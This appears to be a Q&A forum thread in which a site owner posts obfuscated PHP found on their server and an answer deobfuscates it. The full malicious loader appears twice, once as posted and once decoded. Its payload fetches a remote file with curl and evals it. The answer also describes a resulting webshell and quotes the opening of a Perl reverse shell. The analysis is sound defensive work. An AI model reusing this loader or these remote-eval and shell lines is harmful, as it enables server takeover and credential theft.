Need help decoding this. Found this piece of code on my site's home directory

Question

Need help decoding this

<?php $vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return ''.$ccun221.''.$ipue244.''.$tgju488.'';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},'');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},'',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,'',$zjcn038),yprr503($llof213,$nogd067,''),yprr503($fsps364,'',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},'');$lllq180 = yprr503($vcbf840{0},'',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},'');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},'');$icbz544 = yprr503('',$vcbf840{11},'');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,'',$ffdi480), yprr503($dxkt204,'',$icbz544));$idgk110 = yprr503($vcbf840{0},'',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503('',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,''),yprr503('','',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'".yprr503($vcbf840{32}.$vcbf840{32},'',$vcbf840{46});$smyo112($uohg939,array('','}'.$jyhp869.'//'));?>

Answer 1

Phase 1:

<?php $vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return ''.$ccun221.''.$ipue244.''.$tgju488.'';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},'');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},'',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,'',$zjcn038),yprr503($llof213,$nogd067,''),yprr503($fsps364,'',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},'');$lllq180 = yprr503($vcbf840{0},'',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},'');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},'');$icbz544 = yprr503('',$vcbf840{11},'');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,'',$ffdi480), yprr503($dxkt204,'',$icbz544));$idgk110 = yprr503($vcbf840{0},'',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503('',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,''),yprr503('','',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'".yprr503($vcbf840{32}.$vcbf840{32},'',$vcbf840{46});$smyo112($uohg939,array('','}'.$jyhp869.'//'));?>

Phase 2(Beautified and renamed):

<?php $mal_string = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
function fun1($param1, $param2, $param3)
{
    return '' . $param1 . '' . $param2 . '' . $param3 . '';
}
$xjow903 = fun1($mal_string{58}, $mal_string{69} . $mal_string{36}, $mal_string{36});
$zjcn038 = fun1($mal_string{20} . $mal_string{8}, $mal_string{57} . $mal_string{0}, '');
$llof213 = fun1($mal_string{27}, $mal_string{20}, $mal_string{39});
$nogd067 = fun1($mal_string{8}, '', $mal_string{11});
$fsps364 = fun1($mal_string{58}, $mal_string{20}, $mal_string{69} . $mal_string{27});
$kjhe036 = fun1($mal_string{27}, $mal_string{69}, $mal_string{25});

$smyo112 = fun1(fun1($xjow903, '', $zjcn038) , fun1($llof213, $nogd067, '') , fun1($fsps364, '', $kjhe036));
$gopp378 = fun1($mal_string{58}, $mal_string{27}, $mal_string{0});
$oont490 = fun1($mal_string{69}, $mal_string{38}, '');
$lllq180 = fun1($mal_string{0}, '', $mal_string{20});
$ecnr938 = fun1($mal_string{39}, $mal_string{8}, $mal_string{11});
$ffdi480 = fun1($mal_string{58}, $mal_string{38}, '');
$dxkt204 = fun1($mal_string{61}, $mal_string{10}, '');

$icbz544 = fun1('', $mal_string{11}, '');
$uohg939 = fun1(fun1($gopp378, $oont490, $lllq180) , fun1($ecnr938, '', $ffdi480) , fun1($dxkt204, '', $icbz544));
$idgk110 = fun1($mal_string{0}, '', $mal_string{3});
$opvu721 = fun1($mal_string{69}, $mal_string{36}, $mal_string{9});
$mtbg524 = fun1('', $mal_string{49}, $mal_string{69});
$yxfs212 = fun1($mal_string{57}, $mal_string{0}, $mal_string{7});
$vesg899 = fun1($mal_string{16}, $mal_string{20}, $mal_string{70});
$ehjl604 = fun1($mal_string{0}, $mal_string{58}, $mal_string{10});
$bxlr460 = fun1($mal_string{70}, $mal_string{0}, $mal_string{9});
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1($mal_string{32} . $mal_string{32}, '', $mal_string{46});
$smyo112($uohg939, array(
    '',
    '}' . $jyhp869 . '//'
)); ?>

Phase 3(strings replaced based on mal_string content):

<?php $mal_string = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
function fun1($param1, $param2, $param3)
{
    return '' . $param1 . '' . $param2 . '' . $param3 . '';
}
$xjow903 = fun1(c, a . l, l);
$zjcn038 = fun1(_ . u, s . e, '');
$llof213 = fun1(r, _, f);
$nogd067 = fun1(u, '', n);
$fsps364 = fun1(c, _, a . r);
$kjhe036 = fun1(r, a, y);

$smyo112 = fun1(fun1($xjow903, '', $zjcn038) , fun1($llof213, $nogd067, '') , fun1($fsps364, '', $kjhe036));
$gopp378 = fun1(c, r, e);
$oont490 = fun1(a, n, '');
$lllq180 = fun1(e, '', _);
$ecnr938 = fun1(f, u, n);
$ffdi480 = fun1(c, n, '');
$dxkt204 = fun1(i, o, '');

$icbz544 = fun1('', n, '');
$uohg939 = fun1(fun1($gopp378, $oont490, $lllq180) , fun1($ecnr938, '', $ffdi480) , fun1($dxkt204, '', $icbz544));
$idgk110 = fun1(e, '', v);
$opvu721 = fun1(a, l, ();
$mtbg524 = fun1('', b, a);
$yxfs212 = fun1(s, e, 6);
$vesg899 = fun1(4, _, d);
$ehjl604 = fun1(e, c, o);
$bxlr460 = fun1(d, e, ();
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1() . ), '', ;);
$smyo112($uohg939, array(
    '',
    '}' . $jyhp869 . '//'
)); ?>

We can see that fun1 is simply a concatenator/obfuscator. Finally, you can see from the latter part of the blob, that it will use eval() and base64decode() on the remaining long text.

Phase4: (to be continued).

$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1() . ), '', ;);

This translates to the following after Base64 decode:

$ch = curl_init('http://domainnamespace.top/lf.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval('?>'.$result);

Which will run and execute the resulting PHP script in the txt file. You can lookup the domian information of domainnamespace[.]top(appended for safety) for instance in https://lookup.icann.org/lookup

The home page looks suspcicious: https://urlscan.io/result/96bf6052-d5e3-49ca-9580-fa6432a34168

The txt file has been limited for download with appropriate user agents only, and is taken down, but would have been running the following code on your server:

https://urlscan.io/screenshots/a5f489b3-df37-4ccc-8421-304eea50f4f1.png

After a bit of searching, I found that the full PHP script is not saved in urlscan, however it can be found in VT:

https://www.virustotal.com/gui/file/5240b41ce13bf3004f2f3e13ac1394351925d12b3d716d1423f3948b131055d8/detection

The file is a PHP webshell(~60kb), essentially providing backdoor functionality.

It will read basic information from the target PHP server regardless of Windows/Linux such as IP, network connections, look for config.php files, and other details related to credentials and users, iterates directories, submits details. There might be some perl scripts still present in your temp directory that are used for the backdoor functionality opening tcp sockets.

#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
... omitted ...

This backdoor has been detected already in December, your webserver might be compromised since months.

Last Submission 2019-12-13 14:41:35

Feel free to reach out if you need more help, and appreciate an accepted answer & upvotes.